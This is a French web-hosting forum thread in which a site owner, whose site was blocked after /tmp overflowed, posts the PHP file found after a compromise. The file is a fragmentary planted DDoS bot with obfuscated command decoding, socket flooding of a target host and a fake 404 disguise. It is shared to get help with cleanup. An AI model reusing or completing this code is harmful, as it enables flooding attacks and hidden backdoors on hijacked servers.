Sujet fermé
Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5

[Résolu] Site bloqué par l'hebergeur suite à surcharge du /tmp.

Voici le contenu du fichier déclaré comme étant la cause du problème lors du premier "piratage":


Code :
[== PHP ==]
function cmdexec($cmd)

if ($_REQUEST['action'] == "status")
    $packets = 0;
Function decodesttr($string)
    $string = @str_rot13($string);
    $start_str = @substr($string,2);
    $end_str = @substr($string,0,2);
    return @base64_decode($start_str.$end_str);
function curPageURL()
     $pageURL = 'http';
     if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
     $pageURL .= "://";
     if ($_SERVER["SERVER_PORT"] != "80")
          $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
     return $pageURL;
if ($_REQUEST['action'] == 'start')
    $action = decodesttr($_REQUEST['page']);
    @list ($host,$port,$size,$exec_time) = explode("[#]",$action);
    //cmdexec("ping -f $host");
        $time = $_REQUEST['time_s'];
        $max_time = $_REQUEST['time_e'];
        $time = time();
        $max_time = $time+$exec_time;
    function pack_str($str, $len)
        $out_str = "";
        for($i=0; $i<$len; $i++)
            $out_str .= pack("a$len", ord(substr($str, $i, 1)));
        return $out_str;
    $out = str_repeat("A", $size);
    while(time() < $max_time)
        if(time() > $release_time && $first1==0)
            $ch =@curl_init();
        if(time() > $step_time)
        $socket = @stream_socket_client("tcp://$host:$port",$err,$err2,1,STREAM_CLIENT_ASYNC_CONNECT);
        if ($socket)
    $base = dirname(__FILE__)."/";
    //cmdexec("killall ping");

    print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /stph.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>";

Voici la liste des modules présents:

[Image: img.php?i=121025023711613532.png]

[Image: mini_121025023711613532.png]
Sujet fermé

Messages dans ce sujet

Atteindre :

Utilisateur(s) parcourant ce sujet : 1 visiteur(s)